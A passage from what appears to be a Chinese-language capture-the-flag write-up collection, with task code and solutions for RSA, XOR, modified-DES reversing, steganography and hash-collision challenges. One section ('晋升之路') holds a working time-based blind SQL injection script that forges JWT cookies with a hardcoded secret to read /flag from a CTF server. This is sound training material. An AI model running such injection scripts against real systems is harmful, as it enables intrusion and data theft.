d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open(&quot;./message.encrypted&quot;, &quot;rb+&quot;) as f:
    f = f.read()
    print(rsa.decrypt(f, key))
</code></pre>
<h2 id="ziji"><a class="header" href="#ziji">ziji</a></h2>
<pre><code class="language-bash"># python2 decomress_zlib.py
# file:///usr/share/webapps/cyberchef/index.html#recipe=From_Hex('None')
# get 1111111000100001101...
# 用01画图1的话(0,0,0),0的话(255,255,255)
</code></pre>
<pre><code class="language-python"># decomress_zlib.py
# 解压zlib
import zlib
import binascii

idat =&quot;789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A45588138833A170A2071DDCD18219DB8C0D465D8B6989719645ED9C11C36AE3ABDAEFCFC0ACF023E77C17C7897667&quot;.decode(&quot;hex&quot;)
result = binascii.hexlify(zlib.decompress(idat))
print(result)
</code></pre>
<pre><code class="language-python"># draw_img.py
# 像素画图
from PIL import Image
import os
import math
# 用01画图1的话(0,0,0),0的话(255,255,255)
bins = &quot;1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011&quot;

size = int(math.sqrt(len(bins)))
# create a new image size of size*size pixels and black background
pic = Image.new('RGB',(100,100),(0,0,0))
index = 0
for i in range(size):
  for j in range(size):
    if bins[index]==&quot;0&quot;:
      pic.putpixel([j,i],(255,255,255))
    index+=1
pic.save(&quot;all_image.png&quot;)
</code></pre>
<h2 id="xor很心疼你"><a class="header" href="#xor很心疼你">Xor很心疼你</a></h2>
<pre><code class="language-python">#***Task
# Python3
from secret import flag
import random
import base64

pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
r = random.randint(2, 250)
assert flag.startswith('hsctf{')


def generate(length):
    return ''.join(random.choices(pool, k=length))


def f(x):
    random.seed(x)
    return random.getrandbits(8)


def encrypt(plaintext, key):
    plaintext = list(map(ord, plaintext))
    for _ in range(20):
        key = f(key)
        assert key != 0
    for i in range(len(plaintext)):
        key = f(key)
        tmp = (key * r) % 251
        assert tmp != 0 and key != 0
        plaintext[i] = plaintext[i] ^ tmp
    plaintext = bytes(plaintext)
    return base64.b64encode(plaintext)


m = generate(random.randint(200, 300)) + flag + generate(random.randint(200, 300))
c = encrypt(m, random.getrandbits(128))
print(c)
# b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'






#***Solution
# Python3
import random
import base64

cc=b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'
cc=base64.b64decode(cc)
flag = 'hsctf{'
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
assert flag.startswith('hsctf{')


def generate(length):
    return ''.join(random.choices(pool, k=length))


def f(x):
    random.seed(x)
    return random.getrandbits(8)


def encrypt(plaintext, key):
    plaintext = list(map(ord, plaintext))
    for i in range(len(plaintext)):
        key = f(key)
        tmp = (key * r) % 251
        #assert tmp != 0 and key != 0
        plaintext[i] = plaintext[i] ^ tmp
    plaintext = bytes(plaintext)
    return plaintext

def decrypt(ciphertext, key):
    ciphertext=list(ciphertext)
    for i in range(len(ciphertext)):
        key = f(key)
        tmp = (key * r) % 251
        ciphertext[i] = ciphertext[i] ^ tmp
    ciphertext = bytes(ciphertext)
    return ciphertext

for r in range(2,251):
    for key in range(1,256):
        m = flag
        c = encrypt(m, key)
        if(c in cc):
            print(r)
            print(key)
            print(c)
            print(cc.index(c))

r=187
key=34
pos=247
mm=decrypt(cc[247:],key)
print(mm)
</code></pre>
<h2 id="晋升之路"><a class="header" href="#晋升之路">晋升之路</a></h2>
<pre><code class="language-python">###################Solution
import requests
import time
import json
import hmac
import hashlib
import base64
import urllib
header = {
    &quot;alg&quot;: &quot;SHA256&quot;,
    &quot;typ&quot;: &quot;JWT&quot;,
}

secret_key = 'keyfe7dc29e5e3d3f066e5a8a15ba135259'

def b64_encode(s):
    return base64.b64encode(s)

def b64_decode(s):
    return base64.b64decode(s)

def encode_(secret, header, payload):
    header_json = json.dumps(header,separators=(',', ':'), sort_keys=True)
    segments = []
    segments.append(b64_encode(header_json))
    segments.append(b64_encode(payload))
    msg = '.'.join(segments)
    hm = hmac.new(secret, msg, digestmod=hashlib.sha256)
    hm_base64 = b64_encode(hm.digest())
    segments.append(hm_base64)
    token = '.'.join(segments)
    return token

def change(source):
    to=''
    for c in source:
        to+='\u00'+hex(ord(c))[2:]
    return to

headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}

url='http://eci-2ze1tsbvbckimbhvrqqu.cloudeci1.ichunqiu.com:80/'
flag=''
for i in range(1,50):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload=&quot;'^(substr((select/**/binary/**/load_file(0x2f666c6167)),{i},1)&gt;binary/**/{mid})/**/and/**/sleep(2)^'&quot;.format(i=i,mid=hex(mid))
        data='{&quot;data&quot;:&quot;0'+change(payload)+'&quot;}'
        cookies={
        'BestScore':urllib.quote(encode_(secret_key,header,data)),
        'CellState':'eyJhbGciOiJTSEEyNTYiLCJ0eXAiOiJKV1QifQ%3D%3D.eyJkYXRhIjoie1wic2NvcmVcIjozNixcImdyaWRcIjp7XCJzaXplXCI6NCxcImNlbGxzXCI6W1t7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQMlwifV0sW3tcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjB9LFwidmFsdWVcIjpcIlAzXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjF9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjJ9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjN9LFwidmFsdWVcIjpcIlAxXCJ9XSxbe1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MH0sXCJ2YWx1ZVwiOlwiUDJcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MX0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6Mn0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6M30sXCJ2YWx1ZVwiOlwiUDJcIn1dLFt7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQM1wifV1dfX0ifQ%3D%3D.N5Z2xi2%2F64lMHNC81TDUZUS2EIlizpCNcFG3p78WOAQ%3D'
        }
        mid=(left+right)/2
        t1=time.time()
        requests.get(url,headers=headers,cookies=cookies)
        t2=time.time()
        if t2-t1 &gt;1:
            left=mid
        else:
            right=mid
        print left,right
    flag+=chr(right)
    print flag

#python2 jinsheng.py
</code></pre>
<h2 id="wuhen"><a class="header" href="#wuhen">WuHen</a></h2>
<p>分析，程序主动去触发divzero异常，说明有东西隐藏在异常。通过seh去找<br />
start() -&gt; scrt_common_main_seh() -&gt; initterm((_PVFV *)&amp;First, (_PVFV *)&amp;Last); -&gt; 进到First -&gt; sub_7FF781AC1000 -&gt; 7FF781AC2390</p>
<p>发现这里是一个DES算法。rand()是固定</p>
<pre><code class="language-bash">  else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
  {
    v8 = 0;
    *(_QWORD *)(a1[1] + 72) = 0i64;
    qmemcpy(S1, &quot;鏷-%嫋&quot;, 8);
    *(_DWORD *)&amp;S1[12] = 0xD8A5EDAC;
    *(_DWORD *)&amp;S1[16] = 0x23E71CCB;
    *(_DWORD *)&amp;S1[20] = 0x169DDCDA;
    *(_DWORD *)&amp;S1[24] = 0x2DFE7A0;
    *(_DWORD *)&amp;S1[28] = 0x40CA83C;             // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
    KEY[0] = rand();
    KEY[1] = rand();
    KEY[2] = rand();
    KEY[3] = rand();
    KEY[4] = rand();
    KEY[5] = rand();
    KEY[6] = rand();
    KEY[7] = rand();
    ka = *(_QWORD *)KEY;                        // 2923BE84E16CD6AE
    for ( i = 0i64; i != 32; i += 8i64 )
      *(_QWORD *)&amp;In1[i] = Des(*(_QWORD *)&amp;In1[i], ka);
    for ( j = 0i64; j != 32; ++j )
    {
      if ( In1[j] != S1[j] )
        break;
      ++v8;
    }
    if ( v8 == 32 )
      *(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
    return 0xFFFFFFFFi64;
  }
</code></pre>
<p>经过超级长的时间调试找到魔改点在循环左移处，改成了左移2，而且这个是小端的传值，都是反向处理一下。</p>
<pre><code>        for j in range(step):
            t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
            t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
</code></pre>
<pre><code class="language-python">==&gt; main.py &lt;==
from des import Decryption

key = bytes.fromhex('2923BE84E16CD6AE')[::-1]

enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
    enc = bytes.fromhex(enclist[i:i + 16])[::-1]
    res = Decryption(enc, key)
    print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==&gt; CreateSubkey.py &lt;==
MaxTime = 16
# 生成子密钥的置换表1，将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
              1, 58, 50, 42, 34, 26, 18,
              10, 2, 59, 51, 43, 35, 27,
              19, 11, 3, 60, 52, 44, 36,
              63, 55, 47, 39, 31, 23, 15,
              7, 62, 54, 46, 38, 30, 22,
              14, 6, 61, 53, 45, 37, 29,
              21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2，将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
              3, 28, 15, 6, 21, 10,
              23, 19, 12, 4, 26, 8,
              16, 7, 27, 20, 13, 2,
              41, 52, 31, 37, 47, 55,
              30, 40, 51, 45, 33, 48,
              44, 49, 39, 56, 34, 53,
              46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)


def Listmove(l, step):  # 将列表中的元素循环左移
    return l[step:] + l[:step]


def Subkey(key):  # 生成子密钥
    keyresult = []
    key0 = [0 for i in range(56)]

    for i in range(len(key_table1)):
        key0[i] = key[key_table1[i] - 1]

    # 生成16个密钥
    for i in range(MaxTime):
        key1 = [0 for i in range(48)]
        # 确定每次左移的步数
        step = STEP_TABLE[i]
        # if (i == 0 or i == 1 or i == 8 or i == 15):
        #     step = 1
        # else:
        #     step = 2
        # 分成两组
        tmp1 = key0[0:28]
        tmp2 = key0[28:56]
        # print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
        # 循环左移
        # tmp1 = Listmove(tmp1, step)
        # tmp2 = Listmove(tmp2, step)
        for j in range(step):
            t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
            t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
            tmp1 = list(f'{t1:028b}')
            tmp2 = list(f'{t2:028b}')

        # tmp1 = Listmove(tmp1, step*2)
        # tmp2 = Listmove(tmp2, step*2)
        # 左右连接
        key0 = tmp1 + tmp2
        # 置换选择
        for j in range(len(key_table2)):
            key1[j] = key0[key_table2[j] - 1]
        # 生成密钥
        # log(i, key1, tmp1, tmp2)
        keyresult.append(key1)
    # 返回的是一个集合包含了每次的密钥
    return keyresult


def log(i, key1, tmp1, tmp2):
    s = int(''.join(tmp1), 2)
    hex1 =int(''.join(tmp2), 2)
    hex2 = int(''.join(key1), 2)
    print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')

==&gt; des.py &lt;==
import CreateSubkey as cs
import F_function as f

# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f&quot;{x:08b}&quot;]

# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])


# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
    text = Hex2bin(plaintext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = text1[:32]
    R = text1[32:64]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[i])
        # print('xor:', hex(int(''.join(tmp), 2)))
        tmp = f.S_replace(tmp)
        # print('S:', hex(int(''.join(tmp), 2)))
        tmp = f.P_replace(tmp)
        # print('P:', hex(int(''.join(tmp), 2)))
        tmp = f.Xor(tmp, L)
        # print('pres ^ L:', hex(int(''.join(tmp), 2)))
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)


def Decryption(ptext, key):
    text = Hex2bin(ptext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = [text1[i] for i in range(32)]
    R = [text1[i] for i in range(32, 64)]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[15 - i])
        tmp = f.S_replace(tmp)
        tmp = f.P_replace(tmp)
        tmp = f.Xor(tmp, L)
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)

==&gt; F_function.py &lt;==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
            60, 52, 44, 36, 28, 20, 12, 4,
            62, 54, 46, 38, 30, 22, 14, 6,
            64, 56, 48, 40, 32, 24, 16, 8,
            57, 49, 41, 33, 25, 17, 9, 1,
            59, 51, 43, 35, 27, 19, 11, 3,
            61, 53, 45, 37, 29, 21, 13, 5,
            63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
                39, 7, 47, 15, 55, 23, 63, 31,
                38, 6, 46, 14, 54, 22, 62, 30,
                37, 5, 45, 13, 53, 21, 61, 29,
                36, 4, 44, 12, 52, 20, 60, 28,
                35, 3, 43, 11, 51, 19, 59, 27,
                34, 2, 42, 10, 50, 18, 58, 26,
                33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
      0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
      4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
      15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
      3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
      0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
      13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
      13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
      13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
      1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
      13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
      10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
      3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
      14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
      4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
      11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
      10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
      9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
      4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
      13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
      1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
      6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
      1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
      7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
      2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换，将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
                4, 5, 6, 7, 8, 9,
                8, 9, 10, 11, 12, 13,
                12, 13, 14, 15, 16, 17,
                16, 17, 18, 19, 20, 21,
                20, 21, 22, 23, 24, 25,
                24, 25, 26, 27, 28, 29,
                28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
           1, 15, 23, 26, 5, 18, 31, 10,
           2, 8, 24, 14, 32, 27, 3, 9,
           19, 13, 30, 6, 22, 11, 4, 25]


def int2bit(n):  # 0~15整数转比特
    a = []
    for i in range(0, 4):
        a.insert(0, str(n % 2))
        n = int(n / 2)
    return a


# IP置换部分，op为0表示正置换，op为1表示逆置换
def IP(text, op):
    tmp = [0 for i in range(64)]
    if op == 0:
        for i in range(64):
            tmp[i] = text[IP_table[i] - 1]
        return tmp
    if op == 1:
        for i in range(64):
            tmp[i] = text[Inv_IP_table[i] - 1]
        return tmp


# 进行扩展，将32位扩展为48位
def Extend(text):
    extend = [0 for i in range(48)]
    for i in range(48):
        extend[i] = text[extend_table[i] - 1]
    return extend


# S盒变换部分
def S_replace(text):
    Sresult = [0 for k in range(32)]
    for k in range(8):
        row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
        column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
        tmp = S[k][row * 16 + column]

        for i in range(4):
            Sresult[4 * k + i] = int2bit(tmp)[i]
    return Sresult


# P置换部分
def P_replace(text):
    Presult = [0 for i in range(32)]
    for i in range(32):
        Presult[i] = text[P_table[i] - 1]
    return Presult


# 异或运算
def Xor(bit1, bit2):
    Xorresult = [0 for i in range(len(bit1))]
    for i in range(len(bit1)):
        Xorresult[i] = str(int(bit1[i]) ^ int(bit2[i]))
    return Xorresult
</code></pre>
<h2 id="two-old-man"><a class="header" href="#two-old-man">two old man</a></h2>
<pre><code class="language-python">#***Task
from Crypto.Util.number import getPrime, bytes_to_long
from gmpy2 import next_prime
from os import urandom
p = getPrime(512)
q = next_prime(p)
f = open('flag.txt', 'rb')
flag = bytes_to_long(f.read() + urandom(80))
f.close()
n = p * q
noise = 1
for i in range(1, p):
    noise = (noise * i) % n
e = 65537
m = noise * flag % n
c = pow(m, e, n)
f = open('cipher.txt', 'w')
f.write(f'n = {n}\n')
f.write(f'c = {c}\n')
f.close()


# n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
# c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169



#***Solution
# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce

n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161

d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'
</code></pre>
<h2 id="tupian"><a class="header" href="#tupian">tupian</a></h2>
<pre><code class="language-bash">open Stegsolve  open gif imge
Analyse-&gt;frame browser
convert new_gif.gif -coalesce xx_%05d.png
Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
base64_text -d Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
catch_the_dynamic_flag_is_qumte_simple
</code></pre>
<h2 id="train"><a class="header" href="#train">Train</a></h2>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import*
from hashlib import sha256
import socketserver
import signal
import string
import random
from secret import flag

banner = br'''
 .oooooo..o                             oooo  oooo  ooooooooooooo                     o8o
d8P'    `Y8                             `888  `888  8'   888   `8                     `&quot;'
Y88bo.      ooo. .oo.  .oo.    .oooo.    888   888       888      oooo d8b  .oooo.   oooo  ooo. .oo.
 `&quot;Y8888o.  `888P&quot;Y88bP&quot;Y88b  `P  )88b   888   888       888      `888&quot;&quot;8P `P  )88b  `888  `888P&quot;Y88b
     `&quot;Y88b  888   888   888   .oP&quot;888   888   888       888       888      .oP&quot;888   888   888   888
oo     .d8P  888   888   888  d8(  888   888   888       888       888     d8(  888   888   888   888
8&quot;&quot;88888P'  o888o o888o o888o `Y888&quot;&quot;8o o888o o888o     o888o     d888b    `Y888&quot;&quot;8o o888o o888o o888o
'''

n0 = 30798082519452208630254982405300548841337042015746308462162479889627080155514391987610153873334549377764946092629701
g = 64146569863628228208271069055817252751116365290967978172021890038925428672043

def TrainHash(msg):
    n = n0
    msg = map(ord,msg)
    for i in msg :
        n = g * (n+i)
        n = n &amp; (1&lt;&lt;383)
    return n - 0xf5e33dabb114514

table = string.ascii_letters+string.digits

MENU = br'''
&lt;OPTION&gt;
'''

class Task(socketserver.BaseRequestHandler):
    def _recvall(self):
        BUFF_SIZE = 2048
        data = b''
        while True:
            part = self.request.recv(BUFF_SIZE)
            data += part
            if len(part) &lt; BUFF_SIZE:
                break
        return data.strip()

    def send(self, msg, newline=True):
        try:
            if newline:
                msg += b'\n'
            self.request.sendall(msg)
        except:
            pass

    def recv(self, prompt=b'SERVER &lt;INPUT&gt;: '):
        self.send(prompt, newline=False)
        return self._recvall()

    def proof_of_work(self):
        proof = (''.join([random.choice(table)for _ in range(20)])).encode()
        sha = sha256(proof).hexdigest().encode()
        self.send(b&quot;[+] sha256(XXXX+&quot; + proof[4:] + b&quot;) == &quot; + sha )
        XXXX = self.recv(prompt = b'[+] Plz Tell Me XXXX :')
        if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
            return False
        return sha.decode()

    def handle(self):
        signal.alarm(30)
        FirstBlockHash = self.proof_of_work()
        if not FirstBlockHash:
            self.request.close()
        self.send(banner)
        self.send(b&quot;\nPlease give me 2 strings that are same when are hashed  =.=  &quot;)
        string1 = self.recv().decode()
        string2 = self.recv().decode()

        if TrainHash(string1) == TrainHash(string2):
            self.send(b'\nJust do it!~ You can do more!')
            if string2.encode()[-50:] == string1.encode()[-50:]:
                self.send(flag)
        self.send(b&quot;\nConnection has been closed  =.=  &quot;)
        self.request.close()

class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass
